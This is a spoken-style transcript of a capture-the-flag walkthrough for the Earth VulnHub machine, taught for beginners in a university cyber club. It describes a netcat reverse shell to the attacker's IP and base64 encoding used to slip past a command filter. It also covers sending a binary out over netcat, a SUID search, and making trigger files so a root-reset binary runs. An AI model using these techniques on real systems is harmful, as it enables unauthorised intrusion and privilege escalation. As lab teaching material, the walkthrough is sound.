Alright, so today we're going to be doing the Earth Vulnhub box. It's a pretty simple, quick boot to root. Before we get started, if you don't already have them and if you're doing this on an internal network, make sure that you have GoBuster and ltrace installed. To do that, it'll be sudo apt install ltrace, and if this is your first box, you probably don't have GoBuster yet, sudo apt install GoBuster. I already have them and I'm on my internal network right now, so before you start, go ahead and get that done. Then when you're back to your internal network, you can go ahead and get started. Alright, so let's start the reconnaissance phase. Let's go ahead and run an nmap scan and find our target host. Actually, before that, just, in case anyone doesn't know, find your IP address of your system. Mine is 192.168.1.111, and I'm on a 255.255.255 or a /24 network. So I'm going to do a simple scan to start off with, just to find other devices on this network. Hence the /24, because we're on a /24 network, indicated by the 3 255s in the net mask. Alright, so I'll go ahead and get that scan running. So this is a pretty simple box. We're going to find a web server as usual. We're going to gain a foothold on that web server, and then we're going to elevate our privileges to root. The privilege escalation in this isn't necessarily conventional, but it is interesting and it is fun. And it's on the easier side, so this is a great box for beginners. Alright. So we found another machine. We found earth.local. It has a DNS name. That's not necessarily something you always see. Or a host name, I should say. Port 22, SSH is open. What that generally tells us is the attacker that if we can find valid credentials, that is a point of access for us. HTTP and HTTPS are open, so we're probably dealing with a web server here. So let's run a slightly more advanced scan. And we're running this against the target that we just found. So while that's running, let's go ahead and see if we can access this. There we go. Alright. Did I answer that? Nope, that's a 3. Typo on my end. There we go. Let's try that one more time. And we get a bad request 400. So it's something's there, but we're not able to access it since we're getting that 400. So let's go ahead and take a look at this scan. So it gives us a bit more information than the other one did. It has some more information about SSH, but most importantly, right here, this common name, or this DNS name alternative, more importantly. We have some DNS names, which is a domain name system for those who don't know. And DNS, in a very short, uncomplicated way, that's what assigns a host name to an IP address. So we have two. We have earth.local and terratest.earth.local. So the reason we're not able to access the site is because we need to add them to our etc/host file. And I've actually already done that, so I will show you how to do that. We're using the text editor Nano, and this file is located in etc, and it's the host file. So what you'll do is right under here. You'll add the IP address for our target, and then you want to make sure all this lines up perfectly, just like this, earth.local, and then right next to it with one space, terratest.earth.local. So once that's added in, you can hit Control-O to save it, and then Control-X to quit. So now with that done, let's go to, not terratest yet, we'll just start with earth.local. Alright, so this is our target website, the web server we're trying to gain access to. So it's an Earth secure messaging service. Looks like you can put in messages and they'll show up here, hence the previous messages. So these look to be some kind of encoded in some way, and you can see there's a key field here. So this shows us that this is some kind of encryption challenge. It makes me think automatically of RSA because that requires a key. So if we were to put, say, hello world with the message key UWF, we can send that message and see it'll show up right there, and I've done that before. So for someone who gets this and they want to decrypt it, they would need this key, and then they'd be able to get our message of hello world. But we're not worried about our messages, we're worried about the target messages. So let's go ahead and start doing some more reconnaissance about this website. We're going to go and do some directory busting. So make sure you have GoBuster installed. It does not come with Kali. And while this is running, I'll go ahead and explain it. So what this does is we're directory busting. We're finding directories or hidden directories on this web server. So it's using -u for URL. We're giving it earth.local, our target, and -w for our word list, which comes with GoBuster. It's located, here's the path, USR share, word list, dir common.txt. And it looks like it found an admin page. So let's go ahead and take a look at that. Alright, go ahead and log out. If we go to log in, we can see we need to find the username and password for this. So we don't have that right now, but we will find it in due time. So what I like to do is I kind of like to have a tab open for each one of these pages. So we have our earth.local, we have our login page, and now let's go ahead and take a look at terratest.earth.local. And it says test site, please ignore. So obviously we're not going to ignore that. And one thing I want you to notice here is this is actually HTTPS, not HTTP, and we'll need to keep that in mind. So we'll go ahead and do some directory busting here. So we'll start the same way, but we'll do HTTPS terratest.earth.local. We need to add this -k right here. That's because of HTTPS, and then we're going to use the same word list. Alright, so we're now searching this site for hidden directories, and it looks like we found a robots.txt. So just a little word about web application penetration testing. A robots.txt file is a file included on basically every website, which includes pages that they do not want Google's web crawlers to look at. And for us as the attacker, it's usually filled with helpful information, especially in these types of capture the flags, boot to roots, whatever you want to call them. So when I'm doing some kind of challenge or a penetration test, robots.txt is usually the first place I look when I'm in my web application phase. So alright, so it looks like there's a bunch of disallowed things in here, and then you'll see we have a testing notes. So, sounds promising. Let's go ahead and take a look at it. Alright, so let's go ahead and take a look at what we've got here. Testing secure messaging system notes. Using XOR encryption as the algorithm should be safe as used in RSA. So, good information right there. We now know what encryption algorithm is being used for these. Alright. Earth has confirmed they have received our sent messages. Testdata.txt was used to test the encryption. So that tells me that testdata.txt, has what was used to test the encryption, so that's probably the key. And then Terra used as username for admin portal. So we now have a username as well. Now what that immediately says to me is I have a username, we have a login page. We probably want to try brute forcing our way in using something like Hydra or Burp Suite. That's not what we're going to do now, but that's what I go to right off the bat once I find a username and a login page. But let's check out this testdata.txt. And I want to leave this open. And one thing I also want to do, in my documents, I always make a directory for whatever box I'm doing. And it's always important to keep track of things you find. So we found a username, Terra, so we're going to want to save that. Alright, and now let's go ahead and take a look at testdata.txt. Alright, according to radiometric dating, estimation, and other evidence, Earth is formed over yada yada yada. This is the key for this. So now that we have that, we can decrypt these messages. So we're going to use a tool called CyberChef to do that. CyberChef will come in handy in just about any cryptography challenge, whether you're doing National Cyber Leaks, cryptography section. It's an invaluable tool. So you can get it on Kali as an HTML file, and you can just kind of run it locally in your browser. But I'm actually just going to use my regular internet on my host computer. So we'll go to the CyberChef website, or at least just search it in DuckDuckGo and then get to it from there. That's a joke, by the way. Alright, so we know we're working with hex. You would know that from taking these and just kind of putting them into a kind of cipher identifier. And then we know they're using XOR encryption. You want to set this to UTF-8. And then we have that key. Is this recording? Thank God, yes. Okay. We have the key, which is right here. So we're going to take this whole thing, ending with this period. We'll go to CyberChef, put that here. Alright. So let's go ahead and one by one test these out. So we'll put it here for the input. And we get some gibberish. That's alright. All hope isn't lost just yet. Let's try number 2. And some more gibberish. Alright, we got one more. Alright, Earth climate change, bad for humans. Sounds like a password to me. So let's go ahead and grab that. And we're going to go ahead and add that to our credentials. And when you do these, you don't necessarily know that that's the correct password to this account or at all. This all comes from trial and error. Penetration testing, hacking, whatever. It's a lot of trial and error. But luckily for you, I have tried this and errored first. So we know Tara is a username. Now let's go ahead and try this password. Alright, and we're logged into the admin panel now. So, welcome Tara, run your CLI command on Earth, messaging machine, use with care. So CLI, we have a command line interface. Let's try and run some Linux commands. Start off with a simple who am I? Apache. Alright, that kind of tells us what they're working with, but not necessarily pertinent in this situation. Let's try ls-la, make it nice and fancy. Yeah, there we go. Actually, it does not look great right there. Let's just do ls. Alright, so we're basically in the root folder right now, it looks like. I think a pwd will tell us that. Yeah, root. Cool. Alright, so you can, generally what you'd want to do here is just kind of poke around, but for the sake of time, since this is a walkthrough, I'm going to show you where the user flag is. A user flag is kind of just like a halfway point. It doesn't necessarily mean anything. It's just kind of a flag to show yourself, you know, that you got somewhere. So /var. It is located in var earth_web. For anyone who doesn't know, cat is the Linux command for concatenate. It's just to kind of print something to the screen. So we're printing what is located in var earthweb and the userflag.txt text file. And it just kind of prints that out. You know, it's just a flag to show we found something. So now reconnaissance is over. It's time to get a foothold on our target. We're in our gaining access phase. So we have a command line interface. We can enter Linux commands on this system. The Linux commands that we're entering, we're not actually able to like store anything, so we can't upload like a PHP reverse shell or anything like that. Because we can just enter Linux commands, we're going to try and get a shell using netcat. And netcat is a tool known as kind of like the Swiss Army knife of networking, of like network testing. For our purposes as a penetration tester, we're going to be using it as sort of like a walkie-talkie between devices. So we're going to set up what's called a listener. You do that with -lvnp, netcat, nc for netcat, and we're going to set that up on port 4444. It's just a random port generally used for these types of purposes, testing. So we're now listening on that port. Now what we want to do is get netcat to catch that here with a bash shell. So we're going to do nc-e and E is for execute, so we want to execute bash, you know, on the listening target. And that would be our machine. That's my IP address. You also need a space right here. And then another space, and then the listening port 4444, whichever one you specified. You could technically do whichever one you choose as long as it's not in use. Perfect. Netcat -e. -e for execute. We're executing bin bash on my computer 192.168.1.111, and by my computer I mean my virtual machine, so don't try anything. And that port. So remote connections are forbidden. So they do have some sort of protections in place to make sure people don't do this kind of thing. But when has that stopped anyone? So generally when you run into this issue where you want to run a command but something is validating the input and stopping you from doing that, you want to encode that in generally base 64 and then try running it. So that's what we're going to do. So we'll go ahead and split this terminal horizontally, and we're going to do echo our command, and we're going to pipe that to base 64. Just to explain this really quickly, so echo is just kind of sending output, whatever's in these quotes. You can use echo to just print things to the screen, but what we're going to do is use echo to take our command, in quotes, pipe it. When you pipe something, you're sending the output to. So we're sending this, which is the output of echo. We're sending the output to base 64, which is just a command that encodes into base 64. So now we have the base 64 encoded version of this command. So we're going to go ahead and take this whole thing, and whenever you see an equal sign at the end, that generally indicates base 64. You'll come into this encoding a lot, so just something to get familiar with. That's how I always point it out. So we'll go ahead and copy that. We're still listening here, so this is fine. We have to do things a little differently here. So let's get rid of that. So echo, and we're going to put this in single quotes again. Our base 64 encoded command. And let me just make sure I did that command correctly. What are you doing? Get out of here. Yes, okay. We're going to send that, we're going to send that output to base 64-D for decode, and we're going to pipe that to bash. So just to go over this again, we're echoing our base 64 encoded command, and then in the same command it's being decoded here into a bash shell. And then if you look right here, we now have a connection. So we now have our foothold. But one more thing you always want to do when you have this kind of foothold, notice there's nothing there. There's no $sign or username or anything like that, because we don't have bash yet. We just have a connection. So we can technically enter commands, but it's going to be a lot harder. But you can use Python to spin up a bash shell really quickly. And this is something I almost have memorized. You're going to use this a lot. But always have your notes handy. So it's Python -C, and then in single quotes, import pty semicolon pty dot spawn, and then in parentheses /bin/bash, close parentheses, and close single quotes. So it's Python-C, and then in single quotes, import pty semicolon pty dot spawn, in parentheses and double quotes /bin/bash, and now we have a bash shell. Alright, we now have our foothold. Alright, so now that we're in, we can look around, but just to speed things up, we're going to use a command that will help us find everything that we have permission to run. And I will go over this command in just a minute. Alright, so the find command is what you'd use on Linux if you just want to find a file. So let's say you have like a homework.txt and you don't know where it is on your Linux system. You can do find, and then you start at root, which is what we're doing here, which is the slash. So we're checking from the top of the chain of the Linux file structure. So it'll search your entire computer for homework.txt. But in this case, we're looking for dash perm dash u equals s, which is going to find everything with the permissions that the user has the same as the creator, which is the u equals s. Perm is for permissions, u is user, versus the permissions of the file owner equal the permissions of the one running it. And then this just kind of sends all the dev null is kind of, it's a location in Linux. It just kind of gets rid of garbage data. So we're going to send everything that we don't need there, kind of like error messages and stuff. Alright, so this is everything that we're able to run. Looks like we've got mount, su, umount, mount and umount, that's for like hard drive, data storage, that kind of stuff, sudo, and reset root. So resetting root sounds pretty promising when we're trying to elevate our privileges, which is our goal right now. So we're going to do reset root. Go ahead and run that and see what happens. Checking if reset trigger is present. Reset failed. All triggers are not present. Okay, fair enough. So what we want to do now is we want to get our hands on reset root on our local, well, our virtual machine, our machine, so we can go ahead and analyze it a little bit. So let's go ahead and clean that up a little bit. So what we're going to do, we're going to use netcat again, but instead of getting a foothold, we're going to use it to send reset root to our machine. So let me right here, we'll do go open up another listener, but this time we'll do it on 3333. We want to grab reset root. So now it's listening for that reset root. And then here we want to do cat and then my IP. Alright, so we are doing cat, which is just kind of like print whatever's in there. USR, bin stands for binary. That's kind of where the where your ls, cd, those commands are stored. So in that binary file we have one for reset root, and we're sending it over TCP to this IP address over this port. Alright, and there it is. We have reset root right there. So now we want to go ahead and change the permissions of reset root. If anyone doesn't know what chmod is, basically we're giving it read, write, and execute permissions. We'll go more in depth on how that works in another video or in person in the Cyber Club, but for now just know that +X gives it all read, write, execute permissions. And then notice now it's like kind of like blue there instead of white. So remember that ltrace thing I had you install before the video started? So that's where this comes into play. Ltrace is a tool that kind of checks for libraries that are required by a program. So you'll see what I mean. So we're running ltrace, and the // is how you run an executable in Linux. So we're running reset root, and ltrace is going to kind of analyze it for us. Yeah. So it looks like checking if reset trigger is present. So these are the reset triggers that are necessary. So these, what this is telling us is that these need to be present on a machine for root to be reset. So they're not there, so we're going to put them there. So really quick, I'm going to do touch, which is how you create a file. create that one. Alright, so now that those are all there, let's go ahead and, not there, but here. Let's try running reset root now. Alright, check if reset triggers present. Reset triggers are present, resetting root password to earth. So we now have the root password. So, whoops. Ah, dang it. One moment. There we go. Go ahead and check my Python command again. Oh, I know what I missed. Tried to do it from memory. .spawn. There we go. There we go. Alright, we've reset it to earth. Let's try doing this. That. There we go. Alright, we now are root. So let's go ahead and cd to the root directory. There's the root flag.txt. And there it is. Congratulations on completing Earth. So that is how you root this box from start to finish. If you have any questions, feel free to put them in the comments or hit me up on Discord or at the Cyber Club at UWF. Alright. See you next time.